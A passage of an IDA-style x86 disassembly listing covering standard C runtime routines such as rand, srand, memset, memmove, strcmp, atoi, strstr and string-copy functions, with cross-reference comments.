mov eax, [eax]
cmp bl, [eax]
jnz short loc_41522F
loc_41522C: ; CODE XREF: sub_4151C1+60�j
xor edi, edi
inc edi
loc_41522F: ; CODE XREF: sub_4151C1+33�j
; sub_4151C1+58�j ...
inc dword ptr [edx]
and [ebp+var_4], 0
xor eax, eax
inc eax
jmp short loc_4151E4
; ---------------------------------------------------------------------------
loc_41523A: ; CODE XREF: sub_4151C1+2F�j
cmp [ebp+var_8], eax
pop esi
pop ebx
jnz short loc_415247
mov ecx, eax
sub ecx, edi
mov edi, ecx
loc_415247: ; CODE XREF: sub_4151C1+7E�j
cmp edi, eax
jnz short loc_415250
mov eax, [ebp+arg_4]
inc dword ptr [eax]
loc_415250: ; CODE XREF: sub_4151C1+88�j
mov eax, edi
pop edi
leave
retn
sub_4151C1 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415255 proc near ; CODE XREF: sub_41512D+53�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [ebp+arg_4]
mov [ebp+var_4], 1
inc dword ptr [esi]
xor ebx, ebx
jmp short loc_415285
; ---------------------------------------------------------------------------
loc_41526F: ; CODE XREF: sub_415255+36�j
mov dl, [eax]
cmp dl, 3Fh
jz short loc_415280
cmp dl, 2Ah
jnz short loc_415292
cmp dl, 3Fh
jnz short loc_415283
loc_415280: ; CODE XREF: sub_415255+1F�j
inc ecx
mov [edi], ecx
loc_415283: ; CODE XREF: sub_415255+29�j
inc dword ptr [esi]
loc_415285: ; CODE XREF: sub_415255+18�j
mov ecx, [edi]
mov eax, [esi]
cmp [ecx], bl
jnz short loc_41526F
jmp short loc_415292
; ---------------------------------------------------------------------------
loc_41528F: ; CODE XREF: sub_415255+40�j
inc eax
mov [esi], eax
loc_415292: ; CODE XREF: sub_415255+24�j
; sub_415255+38�j
cmp byte ptr [eax], 2Ah
jz short loc_41528F
mov ecx, [edi]
mov dl, [ecx]
cmp dl, bl
jnz short loc_4152B4
cmp [eax], bl
jz short loc_4152A7
xor eax, eax
jmp short loc_415311
; ---------------------------------------------------------------------------
loc_4152A7: ; CODE XREF: sub_415255+4C�j
cmp dl, bl
jnz short loc_4152B4
cmp [eax], bl
jnz short loc_4152B4
xor eax, eax
inc eax
jmp short loc_415311
; ---------------------------------------------------------------------------
loc_4152B4: ; CODE XREF: sub_415255+48�j
; sub_415255+54�j ...
push ecx
push eax
call sub_41512D
pop ecx
test eax, eax
pop ecx
jnz short loc_4152FB
loc_4152C1: ; CODE XREF: sub_415255+A4�j
inc dword ptr [edi]
mov eax, [edi]
jmp short loc_4152D3
; ---------------------------------------------------------------------------
loc_4152C7: ; CODE XREF: sub_415255+86�j
cmp cl, 5Bh
jz short loc_4152DD
cmp dl, bl
jz short loc_4152DD
inc eax
mov [edi], eax
loc_4152D3: ; CODE XREF: sub_415255+70�j
mov ecx, [esi]
mov dl, [eax]
mov cl, [ecx]
cmp cl, dl
jnz short loc_4152C7
loc_4152DD: ; CODE XREF: sub_415255+75�j
; sub_415255+79�j
cmp [eax], bl
jz short loc_4152F2
push eax
push dword ptr [esi]
call sub_41512D
neg eax
pop ecx
sbb eax, eax
pop ecx
inc eax
jmp short loc_4152F7
; ---------------------------------------------------------------------------
loc_4152F2: ; CODE XREF: sub_415255+8A�j
mov [ebp+var_4], ebx
xor eax, eax
loc_4152F7: ; CODE XREF: sub_415255+9B�j
cmp eax, ebx
jnz short loc_4152C1
loc_4152FB: ; CODE XREF: sub_415255+6A�j
mov eax, [edi]
cmp [eax], bl
jnz short loc_41530E
mov eax, [esi]
cmp [eax], bl
jnz short loc_41530E
mov [ebp+var_4], 1
loc_41530E: ; CODE XREF: sub_415255+AA�j
; sub_415255+B0�j
mov eax, [ebp+var_4]
loc_415311: ; CODE XREF: sub_415255+50�j
; sub_415255+5D�j
pop edi
pop esi
pop ebx
leave
retn
sub_415255 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415316 proc near ; CODE XREF: start+61�p sub_4010B2+320�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_417D6C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_415356
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_415363
; ---------------------------------------------------------------------------
loc_415356: ; CODE XREF: sub_415316+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_417C57
pop ecx
pop ecx
loc_415363: ; CODE XREF: sub_415316+3E�j
mov eax, esi
pop esi
leave
retn
sub_415316 endp
; =============== S U B R O U T I N E =======================================
sub_415368 proc near ; CODE XREF: start+2E�p sub_401BD4+46�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4383AC, eax
retn
sub_415368 endp
; =============== S U B R O U T I N E =======================================
sub_415372 proc near ; CODE XREF: sub_4010B2+CB�p
; sub_4010B2+13F�p ...
mov eax, dword_4383AC
imul eax, 343FDh
add eax, 269EC3h
mov dword_4383AC, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_415372 endp
; =============== S U B R O U T I N E =======================================
sub_415390 proc near ; CODE XREF: sub_4010B2+281�p
; sub_401444+180�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_4153E3
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_4153D7
neg ecx
and ecx, 3
jz short loc_4153B9
sub edx, ecx
loc_4153B3: ; CODE XREF: sub_415390+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_4153B3
loc_4153B9: ; CODE XREF: sub_415390+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_4153D7
rep stosd
test edx, edx
jz short loc_4153DD
loc_4153D7: ; CODE XREF: sub_415390+18�j
; sub_415390+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_4153D7
loc_4153DD: ; CODE XREF: sub_415390+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4153E3: ; CODE XREF: sub_415390+A�j
mov eax, [esp+arg_0]
retn
sub_415390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4153F0 proc near ; CODE XREF: sub_4010B2+22D�p
; sub_4010B2+23E�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
mov esi, [ebp+arg_4]
mov ecx, [ebp+arg_8]
mov edi, [ebp+arg_0]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe short loc_415410
cmp edi, eax
jb loc_415588
loc_415410: ; CODE XREF: sub_4153F0+16�j
test edi, 3
jnz short loc_41542C
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_41544C
rep movsd
jmp off_415538[edx*4]
; ---------------------------------------------------------------------------
loc_41542C: ; CODE XREF: sub_4153F0+26�j
mov eax, edi
mov edx, 3
sub ecx, 4
jb short loc_415444
and eax, 3
add ecx, eax
jmp dword ptr loc_41544C+4[eax*4]
; ---------------------------------------------------------------------------
loc_415444: ; CODE XREF: sub_4153F0+46�j
jmp dword ptr loc_415548[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_41544C: ; CODE XREF: sub_4153F0+31�j
; sub_4153F0+8E�j ...
jmp off_4154CC[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_415460
dd offset loc_41548C
dd offset loc_4154B0
; ---------------------------------------------------------------------------
loc_415460: ; DATA XREF: sub_4153F0+64�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
add esi, 3
add edi, 3
cmp ecx, 8
jb short loc_41544C
rep movsd
jmp off_415538[edx*4]
; ---------------------------------------------------------------------------
align 4
loc_41548C: ; DATA XREF: sub_4153F0+68�o
and edx, ecx
mov al, [esi]
mov [edi], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
add esi, 2
add edi, 2
cmp ecx, 8
jb short loc_41544C
rep movsd
jmp off_415538[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4154B0: ; DATA XREF: sub_4153F0+6C�o
and edx, ecx
mov al, [esi]
mov [edi], al
inc esi
shr ecx, 2
inc edi
cmp ecx, 8
jb short loc_41544C
rep movsd
jmp off_415538[edx*4]
; ---------------------------------------------------------------------------
align 4
off_4154CC dd offset loc_41552F ; DATA XREF: sub_4153F0:loc_41544C�r
dd offset loc_41551C
dd offset loc_415514
dd offset loc_41550C
dd offset loc_415504
dd offset loc_4154FC
dd offset loc_4154F4
dd offset loc_4154EC
; ---------------------------------------------------------------------------
loc_4154EC: ; CODE XREF: sub_4153F0:loc_41544C�j
; DATA XREF: sub_4153F0+F8�o
mov eax, [esi+ecx*4-1Ch]
mov [edi+ecx*4-1Ch], eax
loc_4154F4: ; CODE XREF: sub_4153F0:loc_41544C�j
; DATA XREF: sub_4153F0+F4�o
mov eax, [esi+ecx*4-18h]
mov [edi+ecx*4-18h], eax
loc_4154FC: ; CODE XREF: sub_4153F0:loc_41544C�j
; DATA XREF: sub_4153F0+F0�o
mov eax, [esi+ecx*4-14h]
mov [edi+ecx*4-14h], eax
loc_415504: ; CODE XREF: sub_4153F0:loc_41544C�j
; DATA XREF: sub_4153F0+EC�o
mov eax, [esi+ecx*4-10h]
mov [edi+ecx*4-10h], eax
loc_41550C: ; CODE XREF: sub_4153F0:loc_41544C�j
; DATA XREF: sub_4153F0+E8�o
mov eax, [esi+ecx*4-0Ch]
mov [edi+ecx*4-0Ch], eax
loc_415514: ; CODE XREF: sub_4153F0:loc_41544C�j
; DATA XREF: sub_4153F0+E4�o
mov eax, [esi+ecx*4-8]
mov [edi+ecx*4-8], eax
loc_41551C: ; CODE XREF: sub_4153F0:loc_41544C�j
; DATA XREF: sub_4153F0+E0�o
mov eax, [esi+ecx*4-4]
mov [edi+ecx*4-4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_41552F: ; CODE XREF: sub_4153F0:loc_41544C�j
; DATA XREF: sub_4153F0:off_4154CC�o
jmp off_415538[edx*4]
; ---------------------------------------------------------------------------
align 4
off_415538 dd offset loc_415548 ; DATA XREF: sub_4153F0+35�r
; sub_4153F0+92�r ...
dd offset loc_415550
dd offset loc_41555C
dd offset loc_415570
; ---------------------------------------------------------------------------
loc_415548: ; CODE XREF: sub_4153F0+35�j
; sub_4153F0+92�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_415550: ; CODE XREF: sub_4153F0+35�j
; sub_4153F0+92�j ...
mov al, [esi]
mov [edi], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41555C: ; CODE XREF: sub_4153F0+35�j
; sub_4153F0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 10h
loc_415570: ; CODE XREF: sub_4153F0+35�j
; sub_4153F0+92�j ...
mov al, [esi]
mov [edi], al
mov al, [esi+1]
mov [edi+1], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_415588: ; CODE XREF: sub_4153F0+1A�j
lea esi, [ecx+esi-4]
lea edi, [ecx+edi-4]
test edi, 3
jnz short loc_4155BC
shr ecx, 2
and edx, 3
cmp ecx, 8
jb short loc_4155B0
std
rep movsd
cld
jmp off_4156D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
loc_4155B0: ; CODE XREF: sub_4153F0+1B1�j
; sub_4153F0+208�j ...
neg ecx
jmp off_415680[ecx*4]
; ---------------------------------------------------------------------------
align 4
loc_4155BC: ; CODE XREF: sub_4153F0+1A6�j
mov eax, edi
mov edx, 3
cmp ecx, 4
jb short loc_4155D4
and eax, 3
sub ecx, eax
jmp dword ptr loc_4155D4+4[eax*4]
; ---------------------------------------------------------------------------
loc_4155D4: ; CODE XREF: sub_4153F0+1D6�j
; DATA XREF: sub_4153F0+1DD�r
jmp off_4156D0[ecx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_4155E7+1
; ---------------------------------------------------------------------------
or [esi+41h], dl
add [eax], dh
push esi
inc ecx
loc_4155E7: ; DATA XREF: sub_4153F0+1EC�o
add [edx-2EDCFCBAh], cl
mov [edi+3], al
dec esi
shr ecx, 2
dec edi
cmp ecx, 8
jb short loc_4155B0
std
rep movsd
cld
jmp off_4156D0[edx*4]
; ---------------------------------------------------------------------------
align 4
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
shr ecx, 2
mov [edi+2], al
sub esi, 2
sub edi, 2
cmp ecx, 8
jb short loc_4155B0
std
rep movsd
cld
jmp off_4156D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
mov al, [esi+3]
and edx, ecx
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
shr ecx, 2
mov [edi+1], al
sub esi, 3
sub edi, 3
cmp ecx, 8
jb loc_4155B0
std
rep movsd
cld
jmp off_4156D0[edx*4]
; ---------------------------------------------------------------------------
align 4
dd offset loc_415684
dd offset loc_41568C
dd offset loc_415694
dd offset loc_41569C
dd offset loc_4156A4
dd offset loc_4156AC
dd offset loc_4156B4
off_415680 dd offset loc_4156C7 ; DATA XREF: sub_4153F0+1C2�r
; ---------------------------------------------------------------------------
loc_415684: ; DATA XREF: sub_4153F0+274�o
mov eax, [esi+ecx*4+1Ch]
mov [edi+ecx*4+1Ch], eax
loc_41568C: ; DATA XREF: sub_4153F0+278�o
mov eax, [esi+ecx*4+18h]
mov [edi+ecx*4+18h], eax
loc_415694: ; DATA XREF: sub_4153F0+27C�o
mov eax, [esi+ecx*4+14h]
mov [edi+ecx*4+14h], eax
loc_41569C: ; DATA XREF: sub_4153F0+280�o
mov eax, [esi+ecx*4+10h]
mov [edi+ecx*4+10h], eax
loc_4156A4: ; DATA XREF: sub_4153F0+284�o
mov eax, [esi+ecx*4+0Ch]
mov [edi+ecx*4+0Ch], eax
loc_4156AC: ; DATA XREF: sub_4153F0+288�o
mov eax, [esi+ecx*4+8]
mov [edi+ecx*4+8], eax
loc_4156B4: ; DATA XREF: sub_4153F0+28C�o
mov eax, [esi+ecx*4+4]
mov [edi+ecx*4+4], eax
lea eax, ds:0[ecx*4]
add esi, eax
add edi, eax
loc_4156C7: ; CODE XREF: sub_4153F0+1C2�j
; DATA XREF: sub_4153F0:off_415680�o
jmp off_4156D0[edx*4]
; ---------------------------------------------------------------------------
align 10h
off_4156D0 dd offset loc_4156E0 ; DATA XREF: sub_4153F0+1B7�r
; sub_4153F0:loc_4155D4�r ...
dd offset loc_4156E8
dd offset loc_4156F8
dd offset loc_41570C
; ---------------------------------------------------------------------------
loc_4156E0: ; CODE XREF: sub_4153F0+1B7�j
; sub_4153F0:loc_4155D4�j ...
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4156E8: ; CODE XREF: sub_4153F0+1B7�j
; sub_4153F0:loc_4155D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_4156F8: ; CODE XREF: sub_4153F0+1B7�j
; sub_4153F0:loc_4155D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
; ---------------------------------------------------------------------------
align 4
loc_41570C: ; CODE XREF: sub_4153F0+1B7�j
; sub_4153F0:loc_4155D4�j ...
mov al, [esi+3]
mov [edi+3], al
mov al, [esi+2]
mov [edi+2], al
mov al, [esi+1]
mov [edi+1], al
mov eax, [ebp+arg_0]
pop esi
pop edi
leave
retn
sub_4153F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415730 proc near ; CODE XREF: sub_4010B2+FC�p
; sub_4010B2+118�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41577C
loc_415740: ; CODE XREF: sub_415730+3C�j
; sub_415730+66�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_415774
or al, al
jz short loc_415770
cmp ah, [ecx+1]
jnz short loc_415774
or ah, ah
jz short loc_415770
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_415774
or al, al
jz short loc_415770
cmp ah, [ecx+3]
jnz short loc_415774
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_415740
mov edi, edi
loc_415770: ; CODE XREF: sub_415730+18�j
; sub_415730+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_415774: ; CODE XREF: sub_415730+14�j
; sub_415730+1D�j ...
sbb eax, eax
shl eax, 1
inc eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41577C: ; CODE XREF: sub_415730+E�j
test edx, 1
jz short loc_415798
mov al, [edx]
inc edx
cmp al, [ecx]
jnz short loc_415774
inc ecx
or al, al
jz short loc_415770
test edx, 2
jz short loc_415740
loc_415798: ; CODE XREF: sub_415730+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_415774
or al, al
jz short loc_415770
cmp ah, [ecx+1]
jnz short loc_415774
or ah, ah
jz short loc_415770
add ecx, 2
jmp short loc_415740
sub_415730 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4157C0 proc near ; CODE XREF: sub_4010B2+19E�p
; sub_4018CB+11B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, [esp+arg_4]
mov ecx, [esp+arg_C]
or ecx, eax
mov ecx, [esp+arg_8]
jnz short loc_4157D9
mov eax, [esp+arg_0]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_4157D9: ; CODE XREF: sub_4157C0+E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+4+arg_0]
mul [esp+4+arg_C]
add ebx, eax
mov eax, [esp+4+arg_0]
mul ecx
add edx, ebx
pop ebx
retn 10h
sub_4157C0 endp
; =============== S U B R O U T I N E =======================================
sub_4157F4 proc near ; CODE XREF: sub_41587F+4�p
; sub_41EA02+1A2�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_4157FC: ; CODE XREF: sub_4157F4+34�j
cmp dword_4385FC, 1
jle short loc_415814
movzx eax, byte ptr [edi]
push 8
push eax
call sub_418576
pop ecx
pop ecx
jmp short loc_415823
; ---------------------------------------------------------------------------
loc_415814: ; CODE XREF: sub_4157F4+F�j
movzx eax, byte ptr [edi]
mov ecx, off_4383F0
mov al, [ecx+eax*2]
and eax, 8
loc_415823: ; CODE XREF: sub_4157F4+1E�j
test eax, eax
jz short loc_41582A
inc edi
jmp short loc_4157FC
; ---------------------------------------------------------------------------
loc_41582A: ; CODE XREF: sub_4157F4+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_41583A
cmp esi, 2Bh
jnz short loc_41583E
loc_41583A: ; CODE XREF: sub_4157F4+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_41583E: ; CODE XREF: sub_4157F4+44�j
xor ebx, ebx
loc_415840: ; CODE XREF: sub_4157F4+7B�j
cmp dword_4385FC, 1
jle short loc_415855
push 4
push esi
call sub_418576
pop ecx
pop ecx
jmp short loc_415860
; ---------------------------------------------------------------------------
loc_415855: ; CODE XREF: sub_4157F4+53�j
mov eax, off_4383F0
mov al, [eax+esi*2]
and eax, 4
loc_415860: ; CODE XREF: sub_4157F4+5F�j
test eax, eax
jz short loc_415871
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_415840
; ---------------------------------------------------------------------------
loc_415871: ; CODE XREF: sub_4157F4+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_41587A
neg eax
loc_41587A: ; CODE XREF: sub_4157F4+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_4157F4 endp
; =============== S U B R O U T I N E =======================================
sub_41587F proc near ; CODE XREF: sub_4013E8+12�p
; sub_4013E8+1D�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
call sub_4157F4
pop ecx
retn
sub_41587F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41588A proc near ; CODE XREF: sub_401444+3A1�p
; sub_401BD4+4F5�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_417D6C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_4158C9
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_4158D6
; ---------------------------------------------------------------------------
loc_4158C9: ; CODE XREF: sub_41588A+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_417C57
pop ecx
pop ecx
loc_4158D6: ; CODE XREF: sub_41588A+3D�j
mov eax, esi
pop esi
leave
retn
sub_41588A endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4158E0 proc near ; CODE XREF: sub_401BD4+2C3�p
; sub_401BD4+2E3�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_41595A
mov dh, [ecx+1]
test dh, dh
jz short loc_415947
loc_4158F8: ; CODE XREF: sub_4158E0+52�j
; sub_4158E0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_41591A
test al, al
jz short loc_415914
loc_415909: ; CODE XREF: sub_4158E0+32�j
mov al, [esi]
inc esi
loc_41590C: ; CODE XREF: sub_4158E0+3F�j
cmp al, dl
jz short loc_41591A
test al, al
jnz short loc_415909
loc_415914: ; CODE XREF: sub_4158E0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41591A: ; CODE XREF: sub_4158E0+23�j
; sub_4158E0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_41590C
lea edi, [esi-1]
loc_415924: ; CODE XREF: sub_4158E0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_415953
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_4158F8
mov al, [ecx+3]
test al, al
jz short loc_415953
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_415924
jmp short loc_4158F8
; ---------------------------------------------------------------------------
loc_415947: ; CODE XREF: sub_4158E0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_416F26
; ---------------------------------------------------------------------------
loc_415953: ; CODE XREF: sub_4158E0+49�j
; sub_4158E0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_41595A: ; CODE XREF: sub_4158E0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_4158E0 endp
; =============== S U B R O U T I N E =======================================
sub_415960 proc near ; CODE XREF: sub_40211C+92�p
; sub_4059FC+7C�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_415975
or eax, 0FFFFFFFFh
jmp short loc_4159AF
; ---------------------------------------------------------------------------
loc_415975: ; CODE XREF: sub_415960+E�j
test al, 83h
jz short loc_4159AD
push esi
call sub_418704
push esi
mov edi, eax
call sub_41869E
push dword ptr [esi+10h]
call sub_4185EB
add esp, 0Ch
test eax, eax
jge short loc_41599B
or edi, 0FFFFFFFFh
jmp short loc_4159AD
; ---------------------------------------------------------------------------
loc_41599B: ; CODE XREF: sub_415960+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_4159AD
push eax
call sub_415C9B
and dword ptr [esi+1Ch], 0
pop ecx
loc_4159AD: ; CODE XREF: sub_415960+17�j
; sub_415960+39�j ...
mov eax, edi
loc_4159AF: ; CODE XREF: sub_415960+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_415960 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4159B6 proc near ; CODE XREF: sub_40211C+8C�p
; sub_40CD3A+2945�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_4187D6
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_417D6C
push [ebp+arg_0]
mov edi, eax
push esi
call sub_418863
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_4159B6 endp
; =============== S U B R O U T I N E =======================================
sub_4159E8 proc near ; CODE XREF: sub_415A08+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_418A10
test eax, eax
jnz short loc_4159F2
retn
; ---------------------------------------------------------------------------
loc_4159F2: ; CODE XREF: sub_4159E8+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_4188A0
add esp, 10h
retn
sub_4159E8 endp
; =============== S U B R O U T I N E =======================================
sub_415A08 proc near ; CODE XREF: sub_40211C+54�p
; sub_4059FC+2A�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_4159E8
add esp, 0Ch
retn
sub_415A08 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415A20 proc near ; CODE XREF: sub_405A96+2AE�p
; sub_4098D4+75�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_415A91
sub_415A20 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_415A30 proc near ; CODE XREF: sub_40211C+32�p
; sub_40211C+43�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_415A4C
loc_415A3D: ; CODE XREF: sub_415A30+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_415A7F
test ecx, 3
jnz short loc_415A3D
loc_415A4C: ; CODE XREF: sub_415A30+B�j
; sub_415A30+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_415A4C
mov eax, [ecx-4]
test al, al
jz short loc_415A8E
test ah, ah
jz short loc_415A89
test eax, 0FF0000h
jz short loc_415A84
test eax, 0FF000000h
jz short loc_415A7F
jmp short loc_415A4C
; ---------------------------------------------------------------------------
loc_415A7F: ; CODE XREF: sub_415A30+12�j
; sub_415A30+4B�j
lea edi, [ecx-1]
jmp short loc_415A91
; ---------------------------------------------------------------------------
loc_415A84: ; CODE XREF: sub_415A30+44�j
lea edi, [ecx-2]
jmp short loc_415A91
; ---------------------------------------------------------------------------
loc_415A89: ; CODE XREF: sub_415A30+3D�j
lea edi, [ecx-3]
jmp short loc_415A91
; ---------------------------------------------------------------------------
loc_415A8E: ; CODE XREF: sub_415A30+39�j
lea edi, [ecx-4]
loc_415A91: ; CODE XREF: sub_415A20+5�j
; sub_415A30+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_415AB6
loc_415A9D: ; CODE XREF: sub_415A30+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_415B08
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_415A9D
jmp short loc_415AB6
; ---------------------------------------------------------------------------
loc_415AB1: ; CODE XREF: sub_415A30+9E�j
; sub_415A30+B8�j
mov [edi], edx
add edi, 4
loc_415AB6: ; CODE XREF: sub_415A30+6B�j
; sub_415A30+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_415AB1
